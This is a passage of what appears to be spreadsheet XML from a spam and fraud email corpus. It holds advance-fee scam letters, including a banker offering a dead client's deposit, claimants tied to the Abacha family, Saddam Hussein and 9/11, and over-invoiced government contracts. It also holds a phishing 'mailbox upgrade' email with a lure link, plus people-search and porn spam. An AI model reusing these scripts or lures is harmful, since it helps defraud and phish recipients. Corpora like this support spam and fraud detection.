That is: I will simply nominate you as the next of kin and have them release the \ndeposit to you. We share the proceeds 50/50. I would have gone ahead to ask the funds be \nreleased to me, but that would have drawn a straight line to me and my involvement in claiming \nthe deposit. But on the other hand, you with a similar name as the original depositor would \neasily pass as the beneficiary with the rights to claim. I assure you that I could have the \ndeposit released to you in a few days. I will simply inform our bank of the final closing of \nthe file relating to the customer. I will then officially communicate with the finance company \nand instruct them to release the deposit to you. With these two things: all is done.\n\nThe alternative would be for us to have the firm direct the funds to another bank with you as \naccountholder. This way there will be no need for you to think of receiving the money from the \nfirm. We can fine-tune this based on our interactions. I am aware of the consequences of this \nproposal. I ask that if you find no interest in this project that you should discard this \nmail. I ask that you do not be vindictive or destructive. If my offer is of no appeal to you, \ndelete this message and forget I ever contacted you. Do not destroy my career because you do \nnot approve of my proposal. You may not know this but people like myself who have made tidy \nsums out of comparable situations run the whole private banking sector. I am not a criminal \nand what I do, I do not find against good conscience, this may be hard for you to understand, \nbut the dynamics of my industry dictates that I make this move. Such opportunities only come \nones' way once in a lifetime. I cannot let this chance pass me by\n\nI hope you understand because for once I found myself in total control and face to face with \nmy destiny. These chances won't pass me by. I ask that you do not destroy my chance, if you \nwill not work with me let me know and let me move on with my life but do not destroy me. I am \na family man and this is an opportunity to provide them with new opportunities. There is a \nreward for this project and it is a task well worth undertaking. I have evaluated the risks \nand the only risk I have here is from you refusing to work with me and alerting my bank. I am \nthe only one who knows of this situation, good fortune has blessed you with a name that has \nplanted you into the center of relevance in my life. Let's share the blessing.\n\nIf you give me positive signals, I will initiate this process towards a conclusion. I wish to \ninform you that should you contact me via official channels; I will deny knowing you and about \nthis project. I repeat, I do not want you contacting me through my official phone lines nor do \nI want you contacting me through my official email account. Contact me only through this email \naddress (qin_wang1@o2.pl)\n\nI do not want any direct link between you and me. My official lines are not secure lines as \nthey are periodically monitored to assess our level of customer care in line with our Total \nQuality Management Policy.\n\nPlease observe this instruction religiously. Please, again, note I am a family man; I happily \nmarried with two kids. I send you this mail not without a measure of fear as to what the \nconsequences might be, but I know within me that nothing ventured is nothing gained and that \nsuccess and riches never come easy or on a platter of gold. This is the one truth I have \nlearned from my private banking clients. Do not betray my confidence. If we can be of one \naccord, we should plan a meeting, soon.\n\nI await your response.\n\nSincerely,\n\nQin Wang\n\n\n\n\n\n--------------------------------------------------------------------------------------\nfree|access - pripojeni k internetu zdarma na kterem vydelas\nPripoj se k internetu zdarma pres free|access a ziskej vyhody, ktere jinde nedostanes!\n\n[URL]www.freeaccess.cz[/URL]\n\n\n</t>
  </si>
  <si>
    <t>www.freeaccess.cz</t>
  </si>
  <si>
    <t>463</t>
  </si>
  <si>
    <t>To: nan\nFrom: Web Admin &lt;cacheno@comporium.net&gt;\nDate: Thu, 26 Jan 2017 10:07:58 -0500 (EST)</t>
  </si>
  <si>
    <t>Thu, 26 Jan 2017 10:07:58 -0500 (EST)</t>
  </si>
  <si>
    <t>Web Admin &lt;cacheno@comporium.net&gt;</t>
  </si>
  <si>
    <t>Mail Update.</t>
  </si>
  <si>
    <t>Dear email users,  With recent change on our web login portal has led to an upgrading process, please copy link to your browser to upgrade your mailbox now: [URL]http://upgradingsupport.my[/URL]  We are sorry for the inconveniences.  Yours truly  Laura Asley  Software Engineer.  Dear email users,With recent change on our web login portal has led to an upgrading process, please copy link to your browser to upgrade your mailbox now: [URL]http://upgradingsupport.my[/URL] are sorry for the inconveniences.Yours trulyLaura AsleySoftware Engineer.</t>
  </si>
  <si>
    <t>http://upgradingsupport.my http://upgradingsupport.my</t>
  </si>
  <si>
    <t>3054</t>
  </si>
  <si>
    <t>To: nan\nFrom: desmond martin &lt;mr.des116@hotmail.com&gt;\nDate: Thu, 26 Apr 2007 20:21:55 +0000</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2007 20:21:55 +0000</t>
  </si>
  <si>
    <t>desmond martin &lt;mr.des116@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Dear Friend,\n\nGood day. I decided to contact you after I went through my fathers file. \nHence we confide in you. we sincerely seek your assistance.\n\nMy name is Mr.Desmond Martin Olds the only son of Mr.Martin Olds, a wealthy \nfarmer and senior politician with the opposition political party in my \ncountry, Movement for Democratic Change (MDC). Our wicked President Robert  \nmugabe murdered my father, before I ran way from my country because I have \nbecome his next target to eliminate. My father was a fighter for Justice and \na moving force in The MDC, a party wanting to end the several years of \nbrutal Dictatorship government of President Robert Mugabe.\n\nHere is my reason for contacting you. Before the death of my father, he  \ndeposited the sum of Ten Million US Dollars (US$10,000,000.00) with a \nsecurity company,The money was deposited as a gem/precious stone in a metal \ntrunk box to avoid seizure and much demurrage from the security  company \norganization. This money was earmarked for the purchase of new machinery and \nchemicals for the farms and the establishment of new farms in Lesotho and \nSwaziland.\n\nThe government seized my fathers farms and bank account before his Murder. \nHe told me everything concerning the funds while he was still in Alive. This \nis why I need your assistance in securing the funds there in your Country, \nso that I can arrange on how to come over to your country for the investment \nof the fund, I am willing to offer you 15% of the total fund for your \nassistance.as you may know that the financial law and regulations of the \ngovernment does not give we assylum seekers financial rights to such huge \nsum of money. In view of this, The monetary policy/law does not allow such \ninvestment by an asylum seeker or refugee. Please, let me know if you can \nassist me, so that I can give you more details on how we shall proceed.\n\n\nAs I wait for your urgent Response, please treat this\ninformation as top secret. Then u can also contact me through this \nalternative mail (mr_desmond3@yahoo.com.au)\n\nYours Sincerely,\nMr.Desmond Martin.\n\n_________________________________________________________________\nTestez Windows Llive Mail Beta ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1012</t>
  </si>
  <si>
    <t>To: nan\nFrom: MOHAMMED BIN ABDULLAH &lt;mohaabdul@circlemail.com&gt;\nDate: Thu, 25 Nov 2004 21:02:43 -0600</t>
  </si>
  <si>
    <t>Thu, 25 Nov 2004 21:02:43 -0600</t>
  </si>
  <si>
    <t>MOHAMMED BIN ABDULLAH &lt;mohaabdul@circlemail.com&gt;</t>
  </si>
  <si>
    <t>THANKS FOR YOUR WILLINGNESS TO ASSIST</t>
  </si>
  <si>
    <t>\n\nHELLO,\n\nMY NAME IS MOHAMMED BIN ABDULLAH  FROM IRAQ. I WORKED WITH THE DEFUNCT REGIME OF SADDAM HUSSAIN AS HIS SECRET ASSISTANCE. WE HANDLE ALL OF HIS FINANCIAL PLANS AND OTHERS.\n \nSIR I KNOW THE IMPRESSION THE WORLD HAS ABOUT ANY BODY FROM MY COUNTRY IRAQ,DURING MY TIME WITH THE FORMER REGIME,I WAS ABLE TO SECRETLY REMOVE THE SUM OF $15MILLION US DOLLARS. WHICH I TRIED TO SEND OUTSIDE IRAQ VIA WIRE TRANSFER BUT THE BANK REFUSED BECAUSE OF FEAR OF BEING IMPOUNDED ON BY THE AMERICANS. SOME HOW I MANAGED TO SEND THE MONEY ACROSS IRAQ VIA SECRET COURIER SERVICE.\n \nTHE FACT THAT THE FUND IS OUTSIDE IRAQ NOW THAT IS MY HAPPINESS, BUT I AM STILL HIDING IN IRAQ TRYING TO SEE HOW I CAN GET OUT, SINCE MY BOSS WAS TOPPLED. I NEED YOUR URGENT AND SINCERE ASSISTANCE TO HELP ME CLEAR THE MONEY FOR INVESTMENT PURPOSES TILL I COME OUT OF IRAQ TO MEET WITH YOU.\n \nI WILL LET YOU KNOW THE LOCATION AS WELL AS THE DETAILED INFORMATION AS SOON AS YOU ASSURE ME THAT I CAN RELY ON YOU WITHOUT BEEN BETRAYED. PLEASE FOR SAFETY PUROSE, IT IS BETTER WE LIMIT OUT COMMUNICATION TO EMAIL, FOR NOW.YOU ARE GOING TO GET 20% OF THE FUND FOR YOUR ASSISTANCE.\n\nI WILL APPRECIATE IF YOU REPLY ME AS SOON AS POSSIBLE.\n \nTHANKS,\n\nSINCERELY,\n\nMOHAMMED BIN ABDULLAH\n\n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site goddardclan.com\n- [URL]http://goddardclan.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://goddardclan.com</t>
  </si>
  <si>
    <t>To: nan\nFrom: noorget &lt;noorget_esq@web-mail.com.ar&gt;\nDate: Thu, 25 Nov 2004 16:39:22 +0100</t>
  </si>
  <si>
    <t>Thu, 25 Nov 2004 16:39:22 +0100</t>
  </si>
  <si>
    <t>noorget &lt;noorget_esq@web-mail.com.ar&gt;</t>
  </si>
  <si>
    <t>Assist Abachas</t>
  </si>
  <si>
    <t>\n Faizal Noorget Esq. \n PEAK CHAMBERS\n P. O. BOX 5540\n VICTORIA ISLAND\n LAGOS\n TEL: 234 8029134773 \n Email: noorget_esq@web-mail.com.ar \n \n \n \n RE: ABACHA'S FAMILY\n \n We were instructed to contact you by the Abacha's\n family (family of the former Nigerian Military\n Dictator and Head of State General Sani Abacha who\n died on the 8th of June 1998 while in office)\n for assistance in the matter stated below. We have been\n consulted and our services retained by the Late\n Generals wife who is currently on house arrest as a\n result of her family's recent confrontation with the\n present government of the Federal Republic of\n Nigeria Our client's family accounts in Switzerland,\n Amsterdam and some other countries was recently frozen in the\n bead by the Nigerian government to get hold of Late\n General Sani Abachas Money. \n \n \n Recently the Generals first son was arrested for a\n murder charge he did not commit of which we are also\n his attorney.(see attach news paper publication).\n However the late general has some money hidden some\n where in a west African country in the care of a\n security and finance company to the tune of\n $38,000,000.00 in cash which the Nigeria government\n does not know about (PLEASE KEEP CONFIDENTIAL)\n The funds was moved out of the country via\n diplomatic means during the late generals reign in power and\n the family would want you to immediately travel to\n Europe where the funds is being lodged/ contact security/\n Courier company in case you can not travel to Europe\n to work out the fastest way to take possession of\n this money and filter it into a profitable business\n venture to avoid the Nigeria government from ceasing this\n money. \n \n \n For your effort in this you are expected to take 20%\n of this money.\n \n \n The Abachas family are currently not allows assess\n to any of their account both here and outside the\n country and so are relaying heavily on a trusted friend you\n are and this money in there latest ordeal.\n \n \n For more information, you can visit the weblink\n below:\n \n [URL]http://news.bbc.co.uk[/URL]\n [URL]http://www.angelfire.com[/URL]\n [URL]http://www.odili.net[/URL]\n\n[URL]http://www.odiousdebts.org[/URL]\n  \n \n I am desperately contacting you for time essence. I\n have just been informed that one of the desposit\n with a security and courier company in Amsterdam will be\n returned back by the end of this year if not cleared\n and possessed.\n \n \n Send the follow details below: \n (1). Your Name and addresss and\n (2). Confidential telephone and fax numbers.\n \n Please reach us via Tel: (00234) 8029134773 as soon\n as possible indicating your willingness and readiness\n to assistance in this transaction. I will send you more\n details immediately I hear from you.\n \n \n Please treat as urgent.\n \n \n Yours Faithfully\n Faizal Noorget Esq. \n Senior Partner\n Email: noorget_esq@web-mail.com.ar \n \n \n \n \n\n\n\n\n___________________________________________________________________________\nMail sent from WebMail service at PHP-Nuke Powered Site\n- [URL]http://yoursite.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://www.angelfire.com http://www.odili.net http://www.odiousdebts.org http://yoursite.com</t>
  </si>
  <si>
    <t>2122</t>
  </si>
  <si>
    <t>To: joe_kekabu4@latinmail.com &lt;joe_kekabu4@latinmail.com&gt;\nFrom: joe kekabu &lt;joe_kekabu4@latinmail.com&gt;\nDate: Thu, 25 May 2006 22:26:31 +0200</t>
  </si>
  <si>
    <t>Thu, 25 May 2006 22:26:31 +0200</t>
  </si>
  <si>
    <t>joe kekabu &lt;joe_kekabu4@latinmail.com&gt;</t>
  </si>
  <si>
    <t>joe_kekabu4@latinmail.com &lt;joe_kekabu4@latinmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF JOE KEKABU (ESQ).\nTHE HEAD OF FILE DEPARTMENT, AFRICAN\nDEVELOPMENT BANK (ADB)\nOUAGADOUGOU BURKINA-FASO WEST AFRICA.\nPHONE: 00226-7885 7597.\nPLANE CRASH WEB SITE...[URL]http://news.bbc.co.uk[/URL] \n \n                     ("REMITTANCE OF $15 MILLION U.S.A DOLLARS\n                                CONFIDENTIAL IS THE CASE")\n                                  \nCOMLIMENTS OF THE SEASON 2006,\n\nI AM (JOE KEKABU ESQ),HEAD OF FILE DEPARTMENT &amp; DEBT RECOVERING IN AFRICAN DEVELOPMENT BANK OUAGADOUGOU BURKINA-FASO IN WEST AFRICA.\n\nFIRST, I MUST SOLICIT YOUR CONFIDENCE IN THIS TRANSACTION.THIS IS BY \nVIRTUE OF ITS NATURE AS BEING UTTERLY CONFIDENTIAL AND TOP SECRET. \nHOWEVER AFTER SERIES OF PETITION WAS RECIEVED BY THIS PRESENT REGIME FROM FOREIGN CONTRACTORS AND INABILITY OF THE  AFRICAN DEVELOPMENT BANK  (ADB)TO FULFILL THEIR OBLIGATION FOR THE PAYMENT TO ITS FOREIGN CREDITORS, IN CONJUNCTION WITH THE COUNCIL OF MINISTERS, THEY MANDATED US TO CARRY OUT A CAREFUL AND COMPREHENSIVE REVIEW OF ALL OVERDUE PAYMENTS TO FOREIGN CONTRACTORS AND TO EFFECT PAYMENTS IMMEDIATELY.\n\nDURING THE ABOVE MENTIONED PROCESS, WE DISCOVERED AN ABANDONED SUM OF US$15 M (FIFTEEN MILLION US DOLLARS) IN AN ACCOUNT THAT BELONGS TO ONE OF OUR FOREIGN CUSTOMER WHO DIED ALONG WITH HIS ENTIRE FAMILY IN A PLANE CRASH THAT HAPPENED IN (MONDAY 31ST JULY 2000).SINCE WE GOT INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT OF KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT RELEASE IT UNLESS SOME BODY APPLIES FOR IT AS NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN OUR BANKING GUIDELINES AND LAWS BUT UNFORTUNATELY WE LEARNT THAT ALL HIS SUPPOSED NEXT OF KIN OR RELATION DIED ALONGSIDE WITH HIM AT THE PLANE CRASH LEAVING NOBODY BEHIND FOR THE CLAIM.\n \nIT IS THEREFORE UPON THIS DISCOVERY THAT I AND OTHER OFFICIALS IN MY \nDEPARTMENT NOW DECIDED TO MAKE THIS BUSINESS PROPOSAL TO YOU AND RELEASE THE MONEY TO YOU AS THE NEXT OF KIN OR RELATION TO THE DECEASED FOR SAFETY AND SUBSEQUENT DISBURSEMENT SINCE NOBODY IS COMING FOR IT AND WE DON'T WANT THIS MONEY TO GO INTO THE BANK TREASURY AS UNCLAIMED BILL.\n\nI AGREE THAT 40% OF THIS MONEY WILL BE FOR YOU AS A FOREIGN PARTNER, IN RESPECT TO THE PROVISION OF A FOREIGN ACCOUNT,AND 50% WOULD BE FOR ME, WHILE 10% WILL BE FOR EXPENSES INCURE DURING THE TRANSACTION. THERE AFTER I WILL VISIT YOUR COUNTRY FOR DISBURSEMENT ACCORDING TO THE PERCENTAGE INDICATED.THEREFORE, TO ENABLE THE IMMEDIATE TRANSFER OF THIS FUND TO YOU AS ARRANGED, YOU MUST APPLY FIRST TO THE BANK AS RELATION OR NEXT OF KIN OF THE DECEASED INDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR PRIVATE TELEPHONE AND FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION WHEREIN THE MONEY WILL BE REMITTED.\n\nUPON THE RECEIPT OF YOUR REPLY, I WILL SEND TO YOU BY EMAIL THE TEXT OF THE APPLICATION TO FILL AND SEND TO THE BANK. I WILL NOT FAIL TO BRING TO YOUR NOTICE THAT THIS TRANSACTION IS HITCH-FREE RISK AND THIS TRANSACTION WILL ONLY TAKE US 14 BANKING DAYS BECAUSE AS A BANKER, I KNOW WHAT TO DO AND MOVE THE FUND INTO YOUR ACCOUNT WITHOUT ANY DELAY AND THATYOU SHOULD NOT ENTERTAIN ANY ATOM OF FEAR AS ALL REQUIRED ARRANGEMENT HAVE BEEN MADE FOR THE TRANSFER.\n\nYOU SHOULD CONTACT ME OM MY NUMBER 00226-7885 7597 AS SOON AS YOU RECEIVE THIS LETTER SO THAT I WILL SEND YOU THE TEXT OF THE APPLICATION TO APPLY TO THE BANK AND THE DATA INFORMATION OF THE DECEASED .\n\nYOUR'S FAITHFULLY,\n\nJOE KEKABU (ESQ).\n FROM (ADB) OUAGADOUGOU BURKINA-FASO.\n\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>2119</t>
  </si>
  <si>
    <t>To: nan\nFrom: pastor_jonesbell@inet.ua\nDate: Thu, 25 May 2006 19:25:50 +0300</t>
  </si>
  <si>
    <t>Thu, 25 May 2006 19:25:50 +0300</t>
  </si>
  <si>
    <t>pastor_jonesbell@inet.ua</t>
  </si>
  <si>
    <t>I NEED YOUR QUICK RESPONSE</t>
  </si>
  <si>
    <t>I NEED YOUR QUICK RESPONSE\n\nCalvary Greetings\n\nI am a preacher with the Seed Harvest Ministry,and I will like to get advice\nfrom you.I believe the advice I need is secular to some extent, but do have\nthe patience to understand my intention.  \n\nA few year's ago I was in Baghdad,Iraq where I had established a little\ncongregation where I preached regularly,but the war escaleted and the church\nwas converted to a hospital of soughts. Before then, On one faithfull day\nthree American Soldiers came to me and left a trunk box of Money with me and\nswore to come back for it. \n \nWhen the war in Iraq intensified I was escorted to My country Benin Republic\nWest africa, by the U.S soliers who felt the content of the trunk box was\nchurch documents and never cared to check the trunk box,, when I was getting \nfraustrated I returned to Iraq only to find out that two of the three Soldiers\ndied in Battle while the last was decleared MIA (Missing in Action). \n \nNow I have the fund which belongs to the soldiers and which is Eight million\nus dollars ($8,000.000.00),but i have deposited it with a security company\nhere in my country Benin Rep, and I was contacted in a letter dated 10th of\nMay.2006 by the company asking me to indicate if I was in reciept of the\nletter as a sign that I am still living and still subscribed for their\nservice.  \n\nI am interested in using a small fraction of this money,much less than ten\npercent for a re-organisation of the work, but I do not need the rest and do\nnot want to have any direct dealing with it, I need someone who will be able\nto use the fund better maybe for charity or something universally profitable,\nI have thought of doing it my self but, my ministry is the apocalypse and I\nbelieve and preach the soon comming  which make me not indulgent in reliance\non money or wealth in any form. \n \nI also do not have the money that has accrued on the service and safe deposit\nof the company that holds the trunk box, I will be glad if you have any\ninterest in the direction of maybe managing or transmitting the fund as you\nprefer in your capacity like using it to help the motherless and people in the\n3rd world countries. I will like you to give me \nyour phone  number for easy and good communication.  I will be glad to get a\nresponse from you through my \ndirect email address pastor_jonesbell@mail.ru  \n\nRegards.\nPastor Jones Bell\n\n\n----------------------------------------------------------------------------\n   ""!      !\n       !\n. 563-0-563, 566-77-22\n[URL]http://www.adamant.ua[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.adamant.ua</t>
  </si>
  <si>
    <t>UKR</t>
  </si>
  <si>
    <t>2117</t>
  </si>
  <si>
    <t>To: nan\nFrom: Ben Maluleke &lt;benmaluleke_21@hotmail.com&gt;\nDate: Thu, 25 May 2006 16:06:56 +0200</t>
  </si>
  <si>
    <t>Thu, 25 May 2006 16:06:56 +0200</t>
  </si>
  <si>
    <t>Ben Maluleke &lt;benmaluleke_21@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">CAPITAL INVESTMENT </t>
  </si>
  <si>
    <t>&gt;From the Desk of: ENGR. Ben Maluleke. B Sc (CTU) M. Sc,\nDirector, Project Implementation\nCONFIDENTIAL TEL: +27- 83-3557-121\nCONFIDENTIAL FAX: +27-11-5076-933\nE-MAIL ADDRESS   :  mafani_ben_04@yahoo.com\n\nPRIVATE\nDear sir/Madam,\n\nI am Ben Maluleke, a Native of Cape Town in South Africa and I am an \nExecutive Accountant with the South Africa Department of Mining &amp; Natural \nResources. First and foremost, I apologized using this medium to reach you \nfor a transaction/business of this magnitude, but this is due to \nconfidentiality and prompt access reposed on this medium.\n\nBe informed that a member of the South Africa Export Promotion Council \n(SAEPC) who was at the Government delegation to your country during a trade \nexhibition gave your enviable credentials/particulars to me. I have decided \nto seek a confidential co-operation with you in the execution of the deal \ndescribed hereunder for the benefit of all parties and hope you will keep it \nas a top secret because of the nature of this transaction.\n\nWithin the Department of Mining &amp; Natural Resources where I work as an \ndirector and with the cooperation of four other top officials, we have in \nour possession as overdue payment bills totaling Twenty-Seven Million, One \nHundred Thousand united states dollars (US$27,100,000.00) which we want to \ntransfer abroad with the assistance and co-operation of a foreign \ncompany/individual to receive the said fund on our behalf into a reliable \ncompany/individual account depending on your convenience.\nMore so, we are handicapped in the circumstances, as the South Africa Civil \nService Code of Conduct does not allow us to operate offshore account hence \nyour importance the whole transaction. This amount (US$27.1m) represents the \nbalance of the total contract value executed on behalf of my Department by a \nforeign contracting firm, which we the officials over-invoiced deliberately. \nThough the actual contract cost have been paid to the original \ncontractor,leaving the balance in the tune of the said amount which we have \nin principles gotten approval to remit by Key Tested Telegraphic Transfer \n(K.T.T) to any foreign bank account you will provide by filing in an \napplication through the Justice Ministry here in South Africa for the \ntransfer of rights and privileges of the former contractor to you.\n\nI have the authority of my partners involved to propose that should you be \nwilling to assist us in the transaction, your share of the sum will be 30% \nof the US$27.1 million, 60% for us and 10% for taxation and miscellaneous \nexpenses. The business itself is 100% safe, on your part provided you treat \nit with utmost secrecy and confidentiality. Also your area of specialization \nis not a hindrance to the successful execution of this transaction.\n\nI have reposed my confidence in you and hope that you will not disappoint \nme. Endeavor to contact me immediately through my secured tel/fax number \nwhether or not you are interested in this deal. If you are not, it will \nenable me contact other foreign partner with recommendation to carry out \nthis deal. I want to assure you that myself and my partners are in a \nposition to make the payment of this claim possible provided you can give us \na very strong assurance and guarantee that our share will be secured and \nPlease remember to treat this matter as very confidential matter\nbecause we will not comprehend with any form of exposure as we are still in \nactive Government Service and remember once again that time is of the \nessence in this business.\n\nKindly establish your response directly by telephone:+27- \n83-3557-121,fax:+27-11-5076-933  or e-mail: mafani_ben_04@yahoo.com, to the \ncommittee's representative whose name appears below. We wait in anticipation \nof your fullest co-operation.\n\nYours faithfully,\nBen Maluleke (ENGR.)\n\nDEPARTMENT OF MINERALS AND ENERGY\nREPUBLIC OF SOUTH AFRICA.\n\n_________________________________________________________________\nSee their smiles, hear their laughter with MSN Messenger! \n[URL]http://messenger.msn.co.za[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2118</t>
  </si>
  <si>
    <t>To: nan\nFrom: FAN JEN-LIANG &lt;fanjenliang@perpignan.net&gt;\nDate: Thu, 25 May 2006 11:51:57 -0400</t>
  </si>
  <si>
    <t>Thu, 25 May 2006 11:51:57 -0400</t>
  </si>
  <si>
    <t>FAN JEN-LIANG &lt;fanjenliang@perpignan.net&gt;</t>
  </si>
  <si>
    <t>Please contact me by email or telephone</t>
  </si>
  <si>
    <t>MR.FAN JEN-LIANG.\nSHANGHAI COMMERCIAL BANK LIMITED,UK BRANCH\n65 CORNHILL LONDON EC3V 3NP,UNITED KINGDOM.\n\nGreetings,\n\nI would not have used this medium (Internet) but I choose to reach you\nthrough it because it is the fastest,surest and most secured medium of\ncommunication. However,this correspondence is un-official and private,and\nit should be treated as such. I also guarantee you that this transaction\nis risk free from all what you may think of.\n\nI am Mr.Fan Jen-Liang,an account officer with SHANGHAI COMMERCIAL BANK\nLIMITED (London Branch), I am contacting you based on trust and\nconfidentiality that will be attached to this transaction.The Management\nand the Legal department of our BANK (SHANGHAI COMMERCIAL BANK LIMITED UK)\nin a recent meeting,recommended that the account of one of my late\ncustomer and branch depositor MR. YUGUANG ZHENG,should be declared\ndormant,confisticated and the depositor's fund sent to the Bank Treasury\naccording to UK Banking and financial law.\nThe depositor,YUGUANG ZHENG died in world trade centre and was one of the\nvictims of the september 11,2001 incident that befall the United State of\nAmerica,ever since his death the bank has made series of efforts to\ncontact any of the relatives to claim this money but without success, you\ncan confirm through this site:\n[URL]http://www.september11victims.com[/URL]\n\nMR.YUGUANG ZHENG is an account holder in my branch, he owns a dollar\naccount with the sum of US$8.3M (Eight Million,three Hundred Thousand\nUnited States Dollars Only) deposited in a Secret account with my branch\n.In fact, since his death in 2001, no next of kin of the Dollar account\nholder nor any his relative  has shown up to claim his money this is\nbecause he has the account as a secret account and he left all the\ndocuments for the deposit with me.\n\nHaving waited since 2001,I am now fully convinced that no one would turn\nup to claim his money before the bank stipulated collection deadline and\nthis is where I am interested and why I want to present you now to my bank\nas the relation of the deceased,I will use my position here in the bank\nand I will give you the relevant documents and contacts to file in the\nclaim application and then effect the approvals for  the transfer of the\nmoney to your nominated bank account, I will be the one to provide the\nvital documents for the claims of the money and then advise you  exactly\nhow we should handle it.\n\nPlease include your telephone/fax number/ Home Address when replying this\nmail and I will give you more information as soon as you indicate your\nwillingness to assist in this transaction.\nI will use my position to get all internal documentations to back up the\nclaims.Do not be bothered that you are not related in any way to him as I\nam in position to afix your name as the next of kin.\nThe whole Procedures will last only 7 working days to get the fund\nretrieved successfully without trace even in future. After the transfer of\nthe money we shall share the money 60-40,that is I  will have 60% while\nyou will have 40%.\nI await your urgent response to this mail.Reply to my Private Email:\nfanjenliang@terrapins.com or call me on my direct telephone:\n44-7031915718.\n\nRemain blessed,\n\nMR.FAN JEN-LIANG.\nSHANGHAI COMMERCIAL BANK LIMITED,UK(London Branch)\nPrivate Email:fanjenliang@terrapins.com\nDirect Telephone:44-7031915718.\n\n\n</t>
  </si>
  <si>
    <t>http://www.september11victims.com</t>
  </si>
  <si>
    <t>5519</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: "Special Deals" &lt;unsubs-968af93806-cypherpunks=einstein.ssz.com@b.verticalresponse.com&gt;\nDate: Thu, 25 Jul 2002 23:36:47 +0000</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 23:36:47 +0000</t>
  </si>
  <si>
    <t>"Special Deals" &lt;unsubs-968af93806-cypherpunks=einstein.ssz.com@b.verticalresponse.com&gt;</t>
  </si>
  <si>
    <t>, Find Out the Truth About Anyone!</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. --__________MIMEboundary__________ Content-Type: text/plain Content-Transfer-Encoding: quoted-printable X-MIME-Autoconverted: from 8bit to quoted-printable by hq.pro-ns.net id g6Q1hFi4026730  THE EASIEST WAY TO FIND OUT THE TRUTH ABOUT ANYONE People Searches, Background Checks, Criminal Records, Court Records and more. Learn More: [URL]http://r.vresp.com[/URL] Net Detective 7.0 is an amazing new tool that allows you to dig up facts about anyone. It is all completely legal, and you can use it in the privacy of your own home without anyone ever knowing. It's cheaper and faster than hiring a private investigator. Find the scoop on anyone- within minutes.  Family members  Estranged Lovers  Girlfriends/Boyfriends  Neighbors  Enemies  Old Friends  Your Boss  Even yourself!! -------------------------------------------------------------------------= - *LOCATE anyone=92s email address, phone number or address *VERIFY your own credit reports so you can correct wrong information *FIND debtors and locate hidden assets *CHECK driving and criminal records *REUNITE with old classmates, a missing family member, a long lost love *PREVENT identity theft For More Info: [URL]http://r.vresp.com[/URL] Endorsed by the National Association of Independent Private Investigators (NAIPI) ______________________________________________________________________ You have signed up with one of our network partners to receive email providing you with special offers that may appeal to you. If you do not wish to receive these offers in the future, reply to this email with "unsubscribe" in the subject or simply click on the following link:=20 [URL]http://unsubscribe.verticalresponse.com[/URL] --__________MIMEboundary__________ Content-Type: text/html Content-Transfer-Encoding: 7bit     NetDetective--Find Out The Truth About Anyone!                 FIND OUT THE TRUTH ABOUT ANYONE. NOW you can do background investigations of your neighbors, employees, friends and neighbors, using YOUR COMPUTER AT HOME OR WORK!  To find out more click here now!  It's FAST, its EASY and its FUN. NET DETECTIVE 7.0 is an amazing new tool that allows you to dig up facts about anyone. It is all completely legal, and you can use it in the privacy of your own home without anyone ever knowing. It's cheaper and faster than hiring a private investigator.  To find out more click here   NET DETECTIVE 7.0 is endorsed by the National Association of IndependentPrivate Investigators (NAIPI)        You have signed up with one of our network partners to receive email providing you with special offers that may appeal to you. If you do not wish to receive these offers in the future, reply to this email with "unsubscribe" in the subject or simply click on the following link:  Unsubscribe --__________MIMEboundary__________-- .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http://r.vresp.com http://r.vresp.com http://unsubscribe.verticalresponse.com http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5515</t>
  </si>
  <si>
    <t>To: yyyy-linuxapps@spamassassin.taint.org\nFrom: &lt;porn@napster.com&gt;\nDate: Thu, 25 Jul 2002 20:52:44</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 20:52:44</t>
  </si>
  <si>
    <t>&lt;porn@napster.com&gt;</t>
  </si>
  <si>
    <t>yyyy-linuxapps@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Horny?..Stop Paying for Porn - 12 Free Passes</t>
  </si>
  <si>
    <t>![]([URL]http://www.optinemailservices.com[/URL]   ---   |  | I Know You want Pics of Hot Babes Right? I Bet You Want to get into   the Best Porn Sites for Free too? Here's a secret:      ---      &gt; &gt; Get Into Paysites Free!&lt; &lt;      Take a minute to read what I've got to tell you, and will have full access to some of the internet's HOTTEST membership sites for FREE.      **CLICK HERE** _This costs nothing!_   Note: this is not a spam email. This email was sent to you because your email was entered in on a website   requesting to be a registered subscriber. If you would would like to be removed from our list,   CLICK HERE TO CANCEL YOUR ACCOUNT and you will *never* receive another email from us!</t>
  </si>
  <si>
    <t>http://www.optinemailservices.com</t>
  </si>
  <si>
    <t>5522</t>
  </si>
  <si>
    <t>To: juanzec@nameplanet.com, falcon-66@worldnet.att.net, chyche@msn.com,\nFrom: mike0123896138585@yahoo.com\nDate: Thu, 25 Jul 2002 20:07:02 -0500</t>
  </si>
  <si>
    <t>Thu, 25 Jul 2002 20:07:02 -0500</t>
  </si>
  <si>
    <t>mike0123896138585@yahoo.com</t>
  </si>
  <si>
    <t>juanzec@nameplanet.com, falcon-66@worldnet.att.net, chyche@msn.com,</t>
  </si>
  <si>
    <t>Rape!!</t>
  </si>
  <si>
